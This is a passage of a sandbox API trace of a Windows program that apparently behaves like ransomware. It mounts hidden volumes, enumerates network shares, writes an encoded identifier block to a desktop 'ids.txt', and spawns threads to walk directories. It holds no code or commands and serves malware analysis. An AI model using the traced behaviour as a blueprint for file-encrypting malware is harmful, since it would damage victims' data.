(dwErrCode=0x0) [0042.385] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xff798 | out: hHeap=0xe0000) returned 1 [0042.385] FindFirstVolumeW (in: lpszVolumeName=0x6fd8a0, cchBufferLength=0x104 | out: lpszVolumeName="\\\\?\\Volume{df759572-0000-0000-0000-100000000000}\\") returned 0xf10b8 [0042.385] GetVolumePathNamesForVolumeNameW (in: lpszVolumeName="\\\\?\\Volume{df759572-0000-0000-0000-100000000000}\\", lpszVolumePathNames=0x6fd698, cchBufferLength=0x104, lpcchReturnLength=0x6fd694 | out: lpszVolumePathNames=0x6fd698, lpcchReturnLength=0x6fd694) returned 1 [0042.386] FindNextVolumeW (in: hFindVolume=0xf10b8, lpszVolumeName=0x6fd8a0, cchBufferLength=0x104 | out: hFindVolume=0xf10b8, lpszVolumeName="\\\\?\\Volume{df759572-0000-0000-0000-10c37f000000}\\") returned 1 [0042.386] GetVolumePathNamesForVolumeNameW (in: lpszVolumeName="\\\\?\\Volume{df759572-0000-0000-0000-10c37f000000}\\", lpszVolumePathNames=0x6fd698, cchBufferLength=0x104, lpcchReturnLength=0x6fd694 | out: lpszVolumePathNames=0x6fd698, lpcchReturnLength=0x6fd694) returned 1 [0042.386] SetVolumeMountPointW (lpszVolumeMountPoint="z:\\", lpszVolumeName="\\\\?\\Volume{df759572-0000-0000-0000-10c37f000000}\\") returned 1 [0042.388] FindNextVolumeW (in: hFindVolume=0xf10b8, lpszVolumeName=0x6fd8a0, cchBufferLength=0x104 | out: hFindVolume=0xf10b8, lpszVolumeName="\\\\?\\Volume{df759572-0000-0000-0000-10c37f000000}\\") returned 0 [0042.388] FindVolumeClose (hFindVolume=0xf10b8) returned 1 [0042.388] GetLogicalDriveStringsW (in: nBufferLength=0x100, lpBuffer=0x6ff3e8 | out: lpBuffer="C:\\") returned 0x8 [0042.388] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0042.388] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf68a8 [0042.388] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x6) returned 0x105560 [0042.388] RtlInterlockedPushEntrySList (in: ListHead=0xf6750, ListEntry=0xf68b0 | out: ListHead=0xf6750, ListEntry=0xf68b0) returned 0x0 [0042.388] GetDriveTypeW (lpRootPathName="Z:\\") returned 0x3 [0042.388] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6928 [0042.388] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x6) returned 0x105420 [0042.388] RtlInterlockedPushEntrySList (in: ListHead=0xf6750, ListEntry=0xf6930 | out: ListHead=0xf6750, ListEntry=0xf6930) returned 0xf68b0 [0042.388] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x13dfc20, lpParameter=0x100788, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x24c [0042.388] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x6fdaa8 | out: lphEnum=0x6fdaa8*=0x1026d0) returned 0x0 [0042.976] WNetEnumResourceW (in: hEnum=0x1026d0, lpcCount=0x6fdaac, lpBuffer=0x10f168, lpBufferSize=0x6fdab0 | out: lpcCount=0x6fdaac, lpBuffer=0x10f168, lpBufferSize=0x6fdab0) returned 0x0 [0042.982] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x10f168, lphEnum=0x6fda7c | out: lphEnum=0x6fda7c*=0xf6348) returned 0x0 [0043.198] WNetEnumResourceW (in: hEnum=0xf6348, lpcCount=0x6fda80, lpBuffer=0x114178, lpBufferSize=0x6fda84 | out: lpcCount=0x6fda80, lpBuffer=0x114178, lpBufferSize=0x6fda84) returned 0x103 [0043.198] WNetCloseEnum (hEnum=0xf6348) returned 0x0 [0043.198] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x10f188, lphEnum=0x6fda7c | out: lphEnum=0x6fda7c*=0xf6348) returned 0x4b8 [0064.042] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x10f1a8, lphEnum=0x6fda7c | out: lphEnum=0x6fda7c*=0xf6348) returned 0x4c6 [0064.054] WNetEnumResourceW (in: hEnum=0x1026d0, lpcCount=0x6fdaac, lpBuffer=0x10f168, lpBufferSize=0x6fdab0 | out: lpcCount=0x6fdaac, lpBuffer=0x10f168, lpBufferSize=0x6fdab0) returned 0x103 [0064.054] WNetCloseEnum (hEnum=0x1026d0) returned 0x0 [0064.054] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x13dfc20, lpParameter=0x100d70, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x278 [0064.054] WaitForMultipleObjects (nCount=0x2, lpHandles=0x6fdb80*=0x24c, bWaitAll=1, dwMilliseconds=0xffffffff) Thread: id = 2 os_tid = 0x474 Thread: id = 10 os_tid = 0x384 [0042.762] lstrlenA (lpString="b4 JJ up So Ri VJ zb Gs aV zP xm 6E 9W Y1 vI Np\r\nr8 AZ 3V e2 /2 HZ 3m c7 jm eL tD W+ B4 uf S1 ti\r\nDt sJ m2 cw Jt Ud T8 2Z Xb FK Va Cd 1K fR kD X2\r\nwj Ht G7 BW tA mm +H YT 9R vU I5 y9 eh /F 4J GH\r\n+j x1 qZ 6+ tf 2I zQ Sh PI ei T0 Rt U2 M7 1p wT\r\n9Q VS Zp JM Ua UA Lf YT AB yP nf PD Vf 7J Lg s2\r\nmy bV QN IS Bd XQ DS OB tJ sa Hs 5K uR Nj xr sH\r\nNV pi 1D zP l9 V1 Gq 0k Cn WK Om 0Q /F fm oS 55\r\nH5 Jx Dd zc lS Lm uh 0e Qb fg FR Wl lf 0e zP m6\r\nzz On 3h I+ Ux /I cs 0D bM zU /e lR FE q5 +b 53\r\niW eW Ks Ee ZN qJ gP vb 3c 1n iv O5 y3 ih f3 z4\r\n8y aZ jq Oy +L 13 Oj qv Qr Kd hl 2g SU r3 Mv Sa\r\ntv kF TD DN 70 T/ Cv c3 h0 RE rU vo L/ 21 eN zT\r\nuc 1u J/ Op E3 Rx n9 +n Dl jh Mr +v oh xp sN EI\r\nkA YM 2F bl Vl BZ ti +J 2n pk Vb If jW 1M Ee py\r\nUU YZ 06 k/ RM FR tD DV ro Os f8 Zy Jd 7M hk 12\r\nlY bs A1 FV Ri ks fR 2b Wb 88 wL Zq WG 6v Db PN\r\nQ5 X3 LA mF mv qx 1Z mW G2 6k 3o KJ Vg qW 6M F/\r\nco JP wB ws yb zm p9 zT Ja na kx Wb xY Nc f+ Y+\r\nWJ Kj j7 sB S1 RI KH Fh OB aF +3 FZ b0 XD 4G T0\r\nGK fC Qd q5 Vo Md 4O It Nz V/ Fe Q2 51 db hm vg\r\n4t yn AS Fx QT o= ") returned 1047 [0042.763] lstrcatA (in: lpString1="", lpString2="\r\n" | out: lpString1="\r\n") returned="\r\n" [0042.763] lstrcatA (in: lpString1="\r\n", lpString2="local" | out: lpString1="\r\nlocal") returned="\r\nlocal" [0042.763] lstrlenA (lpString="b4 JJ up So Ri VJ zb Gs aV zP xm 6E 9W Y1 vI Np\r\nr8 AZ 3V e2 /2 HZ 3m c7 jm eL tD W+ B4 uf S1 ti\r\nDt sJ m2 cw Jt Ud T8 2Z Xb FK Va Cd 1K fR kD X2\r\nwj Ht G7 BW tA mm +H YT 9R vU I5 y9 eh /F 4J GH\r\n+j x1 qZ 6+ tf 2I zQ Sh PI ei T0 Rt U2 M7 1p wT\r\n9Q VS Zp JM Ua UA Lf YT AB yP nf PD Vf 7J Lg s2\r\nmy bV QN IS Bd XQ DS OB tJ sa Hs 5K uR Nj xr sH\r\nNV pi 1D zP l9 V1 Gq 0k Cn WK Om 0Q /F fm oS 55\r\nH5 Jx Dd zc lS Lm uh 0e Qb fg FR Wl lf 0e zP m6\r\nzz On 3h I+ Ux /I cs 0D bM zU /e lR FE q5 +b 53\r\niW eW Ks Ee ZN qJ gP vb 3c 1n iv O5 y3 ih f3 z4\r\n8y aZ jq Oy +L 13 Oj qv Qr Kd hl 2g SU r3 Mv Sa\r\ntv kF TD DN 70 T/ Cv c3 h0 RE rU vo L/ 21 eN zT\r\nuc 1u J/ Op E3 Rx n9 +n Dl jh Mr +v oh xp sN EI\r\nkA YM 2F bl Vl BZ ti +J 2n pk Vb If jW 1M Ee py\r\nUU YZ 06 k/ RM FR tD DV ro Os f8 Zy Jd 7M hk 12\r\nlY bs A1 FV Ri ks fR 2b Wb 88 wL Zq WG 6v Db PN\r\nQ5 X3 LA mF mv qx 1Z mW G2 6k 3o KJ Vg qW 6M F/\r\nco JP wB ws yb zm p9 zT Ja na kx Wb xY Nc f+ Y+\r\nWJ Kj j7 sB S1 RI KH Fh OB aF +3 FZ b0 XD 4G T0\r\nGK fC Qd q5 Vo Md 4O It Nz V/ Fe Q2 51 db hm vg\r\n4t yn AS Fx QT o= \r\nlocal") returned 1054 [0042.763] RtlInterlockedPopEntrySList (in: ListHead=0xf6750 | out: ListHead=0xf6750) returned 0xf6930 [0042.763] lstrcpynW (in: lpString1=0x108ebd8, lpString2="Z:", iMaxLength=2048 | out: lpString1="Z:") returned="Z:" [0042.763] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105420 | out: hHeap=0xe0000) returned 1 [0042.763] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6928 | out: hHeap=0xe0000) returned 1 [0042.763] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x20) returned 0xff590 [0042.763] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6928 [0042.763] RtlInitializeSListHead (in: ListHead=0xf6930 | out: ListHead=0xf6930) [0042.763] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf63a8 [0042.763] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x6) returned 0x105420 [0042.763] RtlInterlockedPushEntrySList (in: ListHead=0xf6930, ListEntry=0xf63b0 | out: ListHead=0xf6930, ListEntry=0xf63b0) returned 0x0 [0042.763] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x13df500, lpParameter=0xff590, dwCreationFlags=0x4, lpThreadId=0xff598 | out: lpThreadId=0xff598*=0x390) returned 0x260 [0042.763] lstrlenW (lpString="Z:") returned 2 [0042.763] wsprintfA (in: param_1=0x108e7f6, param_2="\r\n%S" | out: param_1="\r\nZ:") returned 4 [0042.763] lstrlenA (lpString="b4 JJ up So Ri VJ zb Gs aV zP xm 6E 9W Y1 vI Np\r\nr8 AZ 3V e2 /2 HZ 3m c7 jm eL tD W+ B4 uf S1 ti\r\nDt sJ m2 cw Jt Ud T8 2Z Xb FK Va Cd 1K fR kD X2\r\nwj Ht G7 BW tA mm +H YT 9R vU I5 y9 eh /F 4J GH\r\n+j x1 qZ 6+ tf 2I zQ Sh PI ei T0 Rt U2 M7 1p wT\r\n9Q VS Zp JM Ua UA Lf YT AB yP nf PD Vf 7J Lg s2\r\nmy bV QN IS Bd XQ DS OB tJ sa Hs 5K uR Nj xr sH\r\nNV pi 1D zP l9 V1 Gq 0k Cn WK Om 0Q /F fm oS 55\r\nH5 Jx Dd zc lS Lm uh 0e Qb fg FR Wl lf 0e zP m6\r\nzz On 3h I+ Ux /I cs 0D bM zU /e lR FE q5 +b 53\r\niW eW Ks Ee ZN qJ gP vb 3c 1n iv O5 y3 ih f3 z4\r\n8y aZ jq Oy +L 13 Oj qv Qr Kd hl 2g SU r3 Mv Sa\r\ntv kF TD DN 70 T/ Cv c3 h0 RE rU vo L/ 21 eN zT\r\nuc 1u J/ Op E3 Rx n9 +n Dl jh Mr +v oh xp sN EI\r\nkA YM 2F bl Vl BZ ti +J 2n pk Vb If jW 1M Ee py\r\nUU YZ 06 k/ RM FR tD DV ro Os f8 Zy Jd 7M hk 12\r\nlY bs A1 FV Ri ks fR 2b Wb 88 wL Zq WG 6v Db PN\r\nQ5 X3 LA mF mv qx 1Z mW G2 6k 3o KJ Vg qW 6M F/\r\nco JP wB ws yb zm p9 zT Ja na kx Wb xY Nc f+ Y+\r\nWJ Kj j7 sB S1 RI KH Fh OB aF +3 FZ b0 XD 4G T0\r\nGK fC Qd q5 Vo Md 4O It Nz V/ Fe Q2 51 db hm vg\r\n4t yn AS Fx QT o= \r\nlocal\r\nZ:") returned 1058 [0042.763] RtlInterlockedPopEntrySList (in: ListHead=0xf6750 | out: ListHead=0xf6750) returned 0xf68b0 [0042.764] lstrcpynW (in: lpString1=0x108ebd8, lpString2="C:", iMaxLength=2048 | out: lpString1="C:") returned="C:" [0042.764] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105560 | out: hHeap=0xe0000) returned 1 [0042.764] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf68a8 | out: hHeap=0xe0000) returned 1 [0042.764] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x20) returned 0xff608 [0042.764] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf68a8 [0042.764] RtlInitializeSListHead (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) [0042.764] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf64e8 [0042.764] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x6) returned 0x105560 [0042.764] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf64f0 | out: ListHead=0xf68b0, ListEntry=0xf64f0) returned 0x0 [0042.764] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x13df500, lpParameter=0xff608, dwCreationFlags=0x4, lpThreadId=0xff610 | out: lpThreadId=0xff610*=0xd98) returned 0x264 [0042.764] lstrlenW (lpString="C:") returned 2 [0042.764] wsprintfA (in: param_1=0x108e7fa, param_2="\r\n%S" | out: param_1="\r\nC:") returned 4 [0042.764] lstrlenA (lpString="b4 JJ up So Ri VJ zb Gs aV zP xm 6E 9W Y1 vI Np\r\nr8 AZ 3V e2 /2 HZ 3m c7 jm eL tD W+ B4 uf S1 ti\r\nDt sJ m2 cw Jt Ud T8 2Z Xb FK Va Cd 1K fR kD X2\r\nwj Ht G7 BW tA mm +H YT 9R vU I5 y9 eh /F 4J GH\r\n+j x1 qZ 6+ tf 2I zQ Sh PI ei T0 Rt U2 M7 1p wT\r\n9Q VS Zp JM Ua UA Lf YT AB yP nf PD Vf 7J Lg s2\r\nmy bV QN IS Bd XQ DS OB tJ sa Hs 5K uR Nj xr sH\r\nNV pi 1D zP l9 V1 Gq 0k Cn WK Om 0Q /F fm oS 55\r\nH5 Jx Dd zc lS Lm uh 0e Qb fg FR Wl lf 0e zP m6\r\nzz On 3h I+ Ux /I cs 0D bM zU /e lR FE q5 +b 53\r\niW eW Ks Ee ZN qJ gP vb 3c 1n iv O5 y3 ih f3 z4\r\n8y aZ jq Oy +L 13 Oj qv Qr Kd hl 2g SU r3 Mv Sa\r\ntv kF TD DN 70 T/ Cv c3 h0 RE rU vo L/ 21 eN zT\r\nuc 1u J/ Op E3 Rx n9 +n Dl jh Mr +v oh xp sN EI\r\nkA YM 2F bl Vl BZ ti +J 2n pk Vb If jW 1M Ee py\r\nUU YZ 06 k/ RM FR tD DV ro Os f8 Zy Jd 7M hk 12\r\nlY bs A1 FV Ri ks fR 2b Wb 88 wL Zq WG 6v Db PN\r\nQ5 X3 LA mF mv qx 1Z mW G2 6k 3o KJ Vg qW 6M F/\r\nco JP wB ws yb zm p9 zT Ja na kx Wb xY Nc f+ Y+\r\nWJ Kj j7 sB S1 RI KH Fh OB aF +3 FZ b0 XD 4G T0\r\nGK fC Qd q5 Vo Md 4O It Nz V/ Fe Q2 51 db hm vg\r\n4t yn AS Fx QT o= \r\nlocal\r\nZ:\r\nC:") returned 1062 [0042.764] RtlInterlockedPopEntrySList (in: ListHead=0xf6750 | out: ListHead=0xf6750) returned 0x0 [0042.764] lstrcatA (in: lpString1="", lpString2="\r\n\r\n" | out: lpString1="\r\n\r\n") returned="\r\n\r\n" [0042.764] lstrlenA (lpString="b4 JJ up So Ri VJ zb Gs aV zP xm 6E 9W Y1 vI Np\r\nr8 AZ 3V e2 /2 HZ 3m c7 jm eL tD W+ B4 uf S1 ti\r\nDt sJ m2 cw Jt Ud T8 2Z Xb FK Va Cd 1K fR kD X2\r\nwj Ht G7 BW tA mm +H YT 9R vU I5 y9 eh /F 4J GH\r\n+j x1 qZ 6+ tf 2I zQ Sh PI ei T0 Rt U2 M7 1p wT\r\n9Q VS Zp JM Ua UA Lf YT AB yP nf PD Vf 7J Lg s2\r\nmy bV QN IS Bd XQ DS OB tJ sa Hs 5K uR Nj xr sH\r\nNV pi 1D zP l9 V1 Gq 0k Cn WK Om 0Q /F fm oS 55\r\nH5 Jx Dd zc lS Lm uh 0e Qb fg FR Wl lf 0e zP m6\r\nzz On 3h I+ Ux /I cs 0D bM zU /e lR FE q5 +b 53\r\niW eW Ks Ee ZN qJ gP vb 3c 1n iv O5 y3 ih f3 z4\r\n8y aZ jq Oy +L 13 Oj qv Qr Kd hl 2g SU r3 Mv Sa\r\ntv kF TD DN 70 T/ Cv c3 h0 RE rU vo L/ 21 eN zT\r\nuc 1u J/ Op E3 Rx n9 +n Dl jh Mr +v oh xp sN EI\r\nkA YM 2F bl Vl BZ ti +J 2n pk Vb If jW 1M Ee py\r\nUU YZ 06 k/ RM FR tD DV ro Os f8 Zy Jd 7M hk 12\r\nlY bs A1 FV Ri ks fR 2b Wb 88 wL Zq WG 6v Db PN\r\nQ5 X3 LA mF mv qx 1Z mW G2 6k 3o KJ Vg qW 6M F/\r\nco JP wB ws yb zm p9 zT Ja na kx Wb xY Nc f+ Y+\r\nWJ Kj j7 sB S1 RI KH Fh OB aF +3 FZ b0 XD 4G T0\r\nGK fC Qd q5 Vo Md 4O It Nz V/ Fe Q2 51 db hm vg\r\n4t yn AS Fx QT o= \r\nlocal\r\nZ:\r\nC:\r\n\r\n") returned 1066 [0042.764] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x268 [0042.765] SetFilePointer (in: hFile=0x268, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0042.765] WriteFile (in: hFile=0x268, lpBuffer=0x108e3d8*, nNumberOfBytesToWrite=0x42a, lpNumberOfBytesWritten=0x108e36c, lpOverlapped=0x0 | out: lpBuffer=0x108e3d8*, lpNumberOfBytesWritten=0x108e36c*=0x42a, lpOverlapped=0x0) returned 1 [0042.768] CloseHandle (hObject=0x268) returned 1 [0042.769] ResumeThread (hThread=0x260) returned 0x1 [0042.769] ResumeThread (hThread=0x264) returned 0x1 [0042.769] WaitForMultipleObjects (nCount=0x2, lpHandles=0x1007ac*=0x260, bWaitAll=0, dwMilliseconds=0x2710) returned 0x0 [0043.302] CloseHandle (hObject=0x260) returned 1 [0043.302] RtlInterlockedPopEntrySList (in: ListHead=0xf6750 | out: ListHead=0xf6750) returned 0xf6610 [0043.302] lstrcpynW (in: lpString1=0x108ebd8, lpString2="Z:\\Recovery", iMaxLength=2048 | out: lpString1="Z:\\Recovery") returned="Z:\\Recovery" [0043.302] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6668 | out: hHeap=0xe0000) returned 1 [0043.303] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6608 | out: hHeap=0xe0000) returned 1 [0043.303] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x20) returned 0xff590 [0043.303] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6388 [0043.303] RtlInitializeSListHead (in: ListHead=0xf6390 | out: ListHead=0xf6390) [0043.303] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6528 [0043.303] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x18) returned 0xf6548 [0043.303] RtlInterlockedPushEntrySList (in: ListHead=0xf6390, ListEntry=0xf6530 | out: ListHead=0xf6390, ListEntry=0xf6530) returned 0x0 [0043.303] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x13df500, lpParameter=0xff590, dwCreationFlags=0x0, lpThreadId=0xff598 | out: lpThreadId=0xff598*=0x540) returned 0x260 [0043.303] WaitForMultipleObjects (nCount=0x2, lpHandles=0x1007ac*=0x264, bWaitAll=0, dwMilliseconds=0x2710) returned 0x1 [0046.225] CloseHandle (hObject=0x260) returned 1 [0046.228] RtlInterlockedPopEntrySList (in: ListHead=0xf6750 | out: ListHead=0xf6750) returned 0xf63b0 [0046.228] lstrcpynW (in: lpString1=0x108ebd8, lpString2="C:\\Windows10Upgrade\\dll1", iMaxLength=2048 | out: lpString1="C:\\Windows10Upgrade\\dll1") returned="C:\\Windows10Upgrade\\dll1" [0046.228] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102950 | out: hHeap=0xe0000) returned 1 [0046.228] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf63a8 | out: hHeap=0xe0000) returned 1 [0046.228] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x20) returned 0xff798 [0046.228] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6408 [0046.228] RtlInitializeSListHead (in: ListHead=0xf6410 | out: ListHead=0xf6410) [0046.233] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6428 [0046.233] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x32) returned 0x102b10 [0046.233] RtlInterlockedPushEntrySList (in: ListHead=0xf6410, ListEntry=0xf6430 | out: ListHead=0xf6410, ListEntry=0xf6430) returned 0x0 [0046.233] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x13df500, lpParameter=0xff798, dwCreationFlags=0x0, lpThreadId=0xff7a0 | out: lpThreadId=0xff7a0*=0xe00) returned 0x260 [0046.259] WaitForMultipleObjects (nCount=0x2, lpHandles=0x1007ac*=0x264, bWaitAll=0, dwMilliseconds=0x2710) returned 0x1 [0046.674] CloseHandle (hObject=0x260) returned 1 [0046.674] RtlInterlockedPopEntrySList (in: ListHead=0xf6750 | out: ListHead=0xf6750) returned 0xf63f0 [0046.674] lstrcpynW (in: lpString1=0x108ebd8, lpString2="C:\\Windows10Upgrade\\resources\\i386", iMaxLength=2048 | out: lpString1="C:\\Windows10Upgrade\\resources\\i386") returned="C:\\Windows10Upgrade\\resources\\i386" [0046.674] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10b6a0 | out: hHeap=0xe0000) returned 1 [0046.674] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf63e8 | out: hHeap=0xe0000) returned 1 [0046.674] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x20) returned 0xff3d8 [0046.674] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf63e8 [0046.674] RtlInitializeSListHead (in: ListHead=0xf63f0 | out: ListHead=0xf63f0) [0046.674] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6368 [0046.674] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x46) returned 0x10b4c0 [0046.674] RtlInterlockedPushEntrySList (in: ListHead=0xf63f0, ListEntry=0xf6370 | out: ListHead=0xf63f0, ListEntry=0xf6370) returned 0x0 [0046.674] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x13df500, lpParameter=0xff3d8, dwCreationFlags=0x0, lpThreadId=0xff3e0 | out: lpThreadId=0xff3e0*=0x200) returned 0x260 [0046.675] WaitForMultipleObjects (nCount=0x2, lpHandles=0x1007ac*=0x264, bWaitAll=0, dwMilliseconds=0x2710) returned 0x1 [0046.974] CloseHandle (hObject=0x260) returned 1 [0046.974] RtlInterlockedPopEntrySList (in: ListHead=0xf6750 | out: ListHead=0xf6750) returned 0x0 [0046.975] WaitForMultipleObjects (nCount=0x1, lpHandles=0x1007ac*=0x264, bWaitAll=0, dwMilliseconds=0x2710) returned 0x102 [0059.822] RtlInterlockedPopEntrySList (in: ListHead=0xf6750 | out: ListHead=0xf6750) returned 0xf65b0 [0059.822] lstrcpynW (in: lpString1=0x108ebd8, lpString2="C:\\Users\\Default", iMaxLength=2048 | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0059.822] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c210 | out: hHeap=0xe0000) returned 1 [0059.822] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf65a8 | out: hHeap=0xe0000) returned 1 [0059.822] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x20) returned 0xff810 [0059.822] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122120 [0059.822] RtlInitializeSListHead (in: ListHead=0x122128 | out: ListHead=0x122128) [0059.822] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122260 [0059.822] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x22) returned 0x10c480 [0059.822] RtlInterlockedPushEntrySList (in: ListHead=0x122128, ListEntry=0x122268 | out: ListHead=0x122128, ListEntry=0x122268) returned 0x0 [0059.822] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x13df500, lpParameter=0xff810, dwCreationFlags=0x0, lpThreadId=0xff818 | out: lpThreadId=0xff818*=0xcc8) returned 0x278 [0059.822] WaitForMultipleObjects (nCount=0x2, lpHandles=0x1007ac*=0x264, bWaitAll=0, dwMilliseconds=0x2710) returned 0x1 [0061.048] CloseHandle (hObject=0x278) returned 1 [0061.048] RtlInterlockedPopEntrySList (in: ListHead=0xf6750 | out: ListHead=0xf6750) returned 0x1222e8 [0061.048] lstrcpynW (in: lpString1=0x108ebd8, lpString2="C:\\Users\\Default\\AppData", iMaxLength=2048 | out: lpString1="C:\\Users\\Default\\AppData") returned="C:\\Users\\Default\\AppData" [0061.048] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1028d0 | out: hHeap=0xe0000) returned 1 [0061.048] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222e0 | out: hHeap=0xe0000) returned 1 [0061.048] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x20) returned 0xff3d8 [0061.048] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1220c0 [0061.048] RtlInitializeSListHead (in: ListHead=0x1220c8 | out: ListHead=0x1220c8) [0061.048] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222e0 [0061.048] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x32) returned 0x102750 [0061.048] RtlInterlockedPushEntrySList (in: ListHead=0x1220c8, ListEntry=0x1222e8 | out: ListHead=0x1220c8, ListEntry=0x1222e8) returned 0x0 [0061.048] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x13df500, lpParameter=0xff3d8, dwCreationFlags=0x0, lpThreadId=0xff3e0 | out: lpThreadId=0xff3e0*=0x2d4) returned 0x278 [0061.049] WaitForMultipleObjects (nCount=0x2, lpHandles=0x1007ac*=0x264, bWaitAll=0, dwMilliseconds=0x2710) returned 0x1 [0061.826] CloseHandle (hObject=0x278) returned 1 [0061.826] RtlInterlockedPopEntrySList (in: ListHead=0xf6750 | out: ListHead=0xf6750) returned 0x122148 [0061.826] lstrcpynW (in: lpString1=0x108ebd8, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCache" [0061.826] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1246a0 | out: hHeap=0xe0000) returned 1 [0061.827] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122140 | out: hHeap=0xe0000) returned 1 [0061.827] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x20) returned 0xff3d8 [0061.827] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122200 [0061.827] RtlInitializeSListHead (in: ListHead=0x122208 | out: ListHead=0x122208) [0061.827] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122260 [0061.827] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xac) returned 0x123a68 [0061.827] RtlInterlockedPushEntrySList (in: ListHead=0x122208, ListEntry=0x122268 | out: 